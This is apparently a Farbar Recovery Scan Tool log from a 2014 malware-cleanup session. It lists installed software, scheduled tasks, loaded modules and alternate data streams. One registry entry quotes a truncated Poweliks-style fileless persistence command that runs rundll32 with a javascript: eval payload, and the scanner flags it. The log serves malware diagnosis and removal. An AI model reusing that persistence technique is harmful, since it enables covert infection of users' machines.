Apple Application Support (HKLM-x32\...\{21ECABC3-40B2-42DF-8E21-ACF3A4D0D95A}) (Version: 3.0.5 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Awakening Kingdoms (HKLM-x32\...\BFG-Awakening Kingdoms) (Version:  - )
Awakening: Moonfell Wood (HKLM-x32\...\BFG-Awakening - Moonfell Wood) (Version:  - )
Awakening: The Dreamless Castle (HKLM-x32\...\BFG-Awakening - The Dreamless Castle) (Version:  - )
Awakening: The Goblin Kingdom (HKLM-x32\...\BFG-Awakening - The Goblin Kingdom) (Version:  - )
Awakening: The Skyward Castle (HKLM-x32\...\BFG-Awakening - The Skyward Castle) (Version:  - )
Awakening: The Sunhook Spire (HKLM-x32\...\BFG-Awakening - The Sunhook Spire) (Version:  - )
Barn Yarn (HKLM-x32\...\BFG-Barn Yarn) (Version:  - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Big Fish: Game Manager (HKLM-x32\...\BFGC) (Version: 3.3.0.2 - )
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-Lot: Mysteries (HKLM-x32\...\BFG-Build-a-Lot - Mysteries) (Version:  - )
calibre (HKLM-x32\...\{7619F973-52CC-433F-BB71-48E034099BFB}) (Version: 0.9.44 - Kovid Goyal)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Standard (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Traditional (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Czech (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Danish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Dutch (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help English (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Finnish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help French (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help German (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Greek (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Hungarian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Italian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Japanese (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Korean (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Norwegian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Polish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Portuguese (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Russian (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Spanish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Swedish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Thai (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
CCC Help Turkish (x32 Version: 2014.0417.2225.38446 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (Version: 2014.0417.2226.38446 - Advanced Micro Devices, Inc.) Hidden
Curse at Twilight: Thief of Souls (HKLM-x32\...\BFG-Curse at Twilight - Thief of Souls) (Version:  - )
Curse Client (HKCU\...\101a9f93b8f0bb6f) (Version: 5.1.1.810 - Curse)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dark Manor: A Hidden Object Mystery (HKLM-x32\...\BFG-Dark Manor - A Hidden Object Mystery) (Version:  - )
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Getting Started Guide (HKLM-x32\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell MusicStage (HKLM-x32\...\{91AF2672-F5BC-42CF-8037-A9D2F92BBCC0}) (Version: 1.5.201.0 - Fingertapps)
Dell PhotoStage (HKLM-x32\...\{E4335E82-17B3-460F-9E70-39D9BC269DB3}) (Version: 1.5.0.65 - ArcSoft)
Dell Stage (HKLM-x32\...\{E2EBA7C0-8072-447F-856D-FFEE8D15B23B}) (Version: 1.5.201.0 - Fingertapps)
Dell Support Center (HKLM\...\Dell Support Center) (Version: 3.1.5803.11 - Dell Inc.)
Dell Support Center (Version: 3.1.5803.11 - PC-Doctor, Inc.) Hidden
Dell VideoStage  (HKLM-x32\...\InstallShield_{DCE0E79A-B9AC-41AC-98C1-7EF0538BCA7F}) (Version: 1.2.0.1712 - CyberLink Corp.)
Dell VideoStage  (x32 Version: 1.2.0.1712 - CyberLink Corp.) Hidden
Diablo III (HKLM-x32\...\Diablo III) (Version:  - Blizzard Entertainment)
Dragon Age: Origins (HKLM-x32\...\{AEC81925-9C76-4707-84A9-40696C613ED3}) (Version: 1.05 - Electronic Arts, Inc.)
Fiona Finch and the Finest Flowers (HKLM-x32\...\BFG-Fiona Finch and the Finest Flowers) (Version:  - )
FrostWire 5.6.9 (HKLM-x32\...\FrostWire 5) (Version: 5.6.9.2 - FrostWire LLC)
Gardenscapes (HKLM-x32\...\BFG-Gardenscapes) (Version:  - )
Gardenscapes 2 (HKLM-x32\...\BFG-Gardenscapes 2) (Version:  - )
Gemini Lost (HKLM-x32\...\BFG-Gemini Lost) (Version:  - )
Google Drive (HKLM-x32\...\{75939021-3B68-419D-8DC1-E9823BFF9658}) (Version: 1.16.7009.9618 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Grim Tales: The Legacy (HKLM-x32\...\BFG-Grim Tales - The Legacy) (Version:  - )
Haunted Halls: Green Hills Sanitarium (HKLM-x32\...\BFG-Haunted Halls - Green Hills Sanitarium) (Version:  - )
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.221 - SurfRight B.V.)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Internet Explorer (x32 Version: 8 - Microsoft Corporation) Hidden
iTunes (HKLM\...\{33E28B58-7BA0-47B7-AA01-9225ABA2B8A9}) (Version: 11.3.0.54 - Apple Inc.)
Jasc Paint Shop Pro 8 Dell Edition (HKLM-x32\...\{81A34902-9D0B-4920-A25C-4CDC5D14B328}) (Version: 8.10.0000 - Jasc Software Inc)
Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.600 - Oracle)
Java Auto Updater (x32 Version: 2.1.60.19 - Oracle, Inc.) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
Magic Encyclopedia: Moon Light (HKLM-x32\...\BFG-Magic Encyclopedia - Moon Light) (Version:  - )
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 (Version: 4.5.50709 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{820B6609-4C97-3A2B-B644-573B06A0F0CC}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.50727 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.50727 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden
Moai: Build Your Dream (HKLM-x32\...\BFG-Moai - Build Your Dream) (Version:  - )
Mozilla Firefox 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
Mumble 1.2.4 (HKLM-x32\...\{E0955568-4353-4C85-8988-285A8C0F5E87}) (Version: 1.2.4 - Thorvald Natvig)
Northern Tale (HKLM-x32\...\BFG-Northern Tale) (Version:  - )
NVIDIA PhysX (HKLM-x32\...\{1C4551A6-4743-4093-91E4-1477CD655043}) (Version: 9.09.0203 - NVIDIA Corporation)
Plantasia (HKLM-x32\...\BFG-Plantasia) (Version:  - )
Plants vs. Zombies (HKLM-x32\...\BFG-Plants vs Zombies) (Version:  - )
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Ranch Rush (HKLM-x32\...\BFG-Ranch Rush) (Version:  - )
Ranch Rush 2 - Sara's Island Experiment (HKLM-x32\...\BFG-Ranch Rush 2 - Sara's Island Experiment) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6050 - Realtek Semiconductor Corp.)
Royal Envoy (HKLM-x32\...\BFG-Royal Envoy) (Version:  - )
Royal Envoy 2 (HKLM-x32\...\BFG-Royal Envoy 2) (Version:  - )
Royal Envoy 3 (HKLM-x32\...\BFG-Royal Envoy 3) (Version:  - )
Royal Envoy: Campaign for the Crown Collector's Edition (HKLM-x32\...\BFG-Royal Envoy - Campaign for the Crown Collectors Edition) (Version:  - )
Shaolin Mystery: Revenge of the Terracotta Warriors (HKLM-x32\...\BFG-Shaolin Mystery - Revenge of the Terracotta Warriors) (Version:  - )
Shaolin Mystery: Tale of the Jade Dragon Staff (HKLM-x32\...\BFG-Shaolin Mystery - Tale of the Jade Dragon Staff) (Version:  - )
Skype™ 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.)
Slingo Supreme (HKLM-x32\...\BFG-Slingo Supreme) (Version:  - )
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
The Fall Trilogy: Chapter 1 (HKLM-x32\...\BFG-The Fall Trilogy - Chapter 1) (Version:  - )
The Fifth Gate (HKLM-x32\...\BFG-The Fifth Gate) (Version:  - )
THX TruStudio PC (HKLM-x32\...\{010A785B-F920-4350-821B-6309909C20BB}) (Version: 1.0 - Creative Technology Limited)
Turbo Subs (HKLM-x32\...\BFG-Turbo Subs) (Version:  - )
Ventrilo Client for Windows x64 (HKLM\...\{EEB3F6BB-318D-4CE5-989F-8191FCBFB578}) (Version: 3.0.8.0 - Flagship Industries, Inc.)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Wandering Willows (HKLM-x32\...\BFG-Wandering Willows) (Version:  - )
Warcraft III (HKLM-x32\...\Warcraft III) (Version:  - )
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
World of Zellians: Kingdom Builder ™ (HKLM-x32\...\BFG-World of Zellians - Kingdom Builder) (Version:  - )
Youda Sushi Chef (HKLM-x32\...\BFG-Youda Sushi Chef) (Version:  - )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3699948125-3592849413-3750068687-1000_Classes\CLSID\{3a66d1eb-fd23-4e9b-9d6d-64465d8ce9d6}\InprocServer32 -> C:\Windows\system32\dfshim.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3699948125-3592849413-3750068687-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

27-07-2014 01:02:40 Removed Compatibility Pack for the 2007 Office system
27-07-2014 01:07:23 Removed Microsoft Office Click-to-Run 2010
27-07-2014 01:08:06 Removed Microsoft Office 2010
27-07-2014 01:09:27 Removed Microsoft Office XP Media Content
02-08-2014 21:52:50 AA11
03-08-2014 01:15:47 Checkpoint by HitmanPro
03-08-2014 01:17:08 Checkpoint by HitmanPro
03-08-2014 02:51:39 Checkpoint by HitmanPro
03-08-2014 08:14:12 AA11

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {148CD901-CD13-4690-A561-B9C2C92F64ED} - System32\Tasks\PCDEventLauncher => C:\Program Files\Dell Support Center\sessionchecker.exe [2011-03-22] (PC-Doctor, Inc.)
Task: {16F02DF3-F1AD-4A10-B1AA-1158CC858452} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {36C40F93-B95C-4009-9688-D97C7CF7C615} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell Support Center\uaclauncher.exe [2011-03-22] (PC-Doctor, Inc.)
Task: {6D03F4D1-4A0D-4A70-9F2E-DC6D23186A6E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-07-08] (Adobe Systems Incorporated)
Task: {73A6AD3E-4209-42AF-AF6C-B71602B2925F} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\Dell Support Center\pcdrcui.exe [2011-03-22] (PC-Doctor, Inc.)
Task: {B7155BF7-F804-4338-93D4-17105E8F6FA2} - \PC_Booster-S-493389286 No Task File <==== ATTENTION
Task: {DDCB6595-01EB-4492-88AC-CD0535B7AF92} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\Dell Support Center\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\Dell Support Center\pcdrcui.exe

==================== Loaded Modules (whitelisted) =============

2014-02-06 01:52 - 2014-02-06 01:52 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-02-06 01:52 - 2014-02-06 01:52 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-08-03 03:16 - 2014-08-03 03:16 - 00098816 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32api.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00110080 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\pywintypes27.dll
2014-08-03 03:16 - 2014-08-03 03:16 - 00364544 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\pythoncom27.dll
2014-08-03 03:16 - 2014-08-03 03:16 - 00045568 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_socket.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 01160704 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_ssl.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00320512 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32com.shell.shell.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00713216 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_hashlib.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 01175040 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._core_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00805888 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._gdi_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00811008 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._windows_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 01062400 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._controls_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00735232 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._misc_.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00128512 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_elementtree.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00127488 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\pyexpat.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00557056 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\pysqlite2._sqlite.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00007168 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\hashobjs_ext.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00087552 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_ctypes.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00119808 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32file.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00108544 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32security.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00018432 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32event.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00038912 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32inet.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00070656 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._html2.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00167936 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32gui.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00011264 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32crypt.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00027136 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\_multiprocessing.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00122368 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._wizard.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00010240 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\select.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00024064 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32pipe.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00686080 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\unicodedata.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00025600 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32pdh.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00525640 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\windows._lib_cacheinvalidation.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00035840 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32process.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00017408 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32profile.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00022528 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\win32ts.pyd
2014-08-03 03:16 - 2014-08-03 03:16 - 00078336 _____ () C:\Users\Ice\AppData\Local\Temp\_MEI29882\wx._animate.pyd
2014-07-22 16:24 - 2014-07-22 16:25 - 03800688 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
2014-07-08 20:39 - 2014-07-08 20:39 - 17029808 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll
2011-08-18 19:15 - 2011-08-18 19:15 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\950beee973490b3f5e9a2c2701bc1050\IsdiInterop.ni.dll
2011-08-18 19:14 - 2010-03-03 20:08 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:02A78DF6
AlternateDataStreams: C:\ProgramData\Temp:0BF4DA47
AlternateDataStreams: C:\ProgramData\Temp:0E22C5DB
AlternateDataStreams: C:\ProgramData\Temp:124B94C0
AlternateDataStreams: C:\ProgramData\Temp:12A012A1
AlternateDataStreams: C:\ProgramData\Temp:162E02F7
AlternateDataStreams: C:\ProgramData\Temp:164561C8
AlternateDataStreams: C:\ProgramData\Temp:206470A5
AlternateDataStreams: C:\ProgramData\Temp:220E9B9E
AlternateDataStreams: C:\ProgramData\Temp:2AE74FF9
AlternateDataStreams: C:\ProgramData\Temp:2CB9631F
AlternateDataStreams: C:\ProgramData\Temp:31C9BA96
AlternateDataStreams: C:\ProgramData\Temp:33DB8278
AlternateDataStreams: C:\ProgramData\Temp:363E775E
AlternateDataStreams: C:\ProgramData\Temp:395F6776
AlternateDataStreams: C:\ProgramData\Temp:425759C6
AlternateDataStreams: C:\ProgramData\Temp:432EC713
AlternateDataStreams: C:\ProgramData\Temp:48977386
AlternateDataStreams: C:\ProgramData\Temp:491270B8
AlternateDataStreams: C:\ProgramData\Temp:4F96D8E6
AlternateDataStreams: C:\ProgramData\Temp:517B507A
AlternateDataStreams: C:\ProgramData\Temp:57173DB4
AlternateDataStreams: C:\ProgramData\Temp:5C3ED5BB
AlternateDataStreams: C:\ProgramData\Temp:65AB2A58
AlternateDataStreams: C:\ProgramData\Temp:6677D85A
AlternateDataStreams: C:\ProgramData\Temp:69AF9D20
AlternateDataStreams: C:\ProgramData\Temp:6E11933F
AlternateDataStreams: C:\ProgramData\Temp:6E65510A
AlternateDataStreams: C:\ProgramData\Temp:6E6A4F42
AlternateDataStreams: C:\ProgramData\Temp:6F1F66C0
AlternateDataStreams: C:\ProgramData\Temp:76466F4C
AlternateDataStreams: C:\ProgramData\Temp:7BB584AA
AlternateDataStreams: C:\ProgramData\Temp:7FA0D639
AlternateDataStreams: C:\ProgramData\Temp:993185CB
AlternateDataStreams: C:\ProgramData\Temp:9D03192E
AlternateDataStreams: C:\ProgramData\Temp:9D0A16E4
AlternateDataStreams: C:\ProgramData\Temp:A6B07419
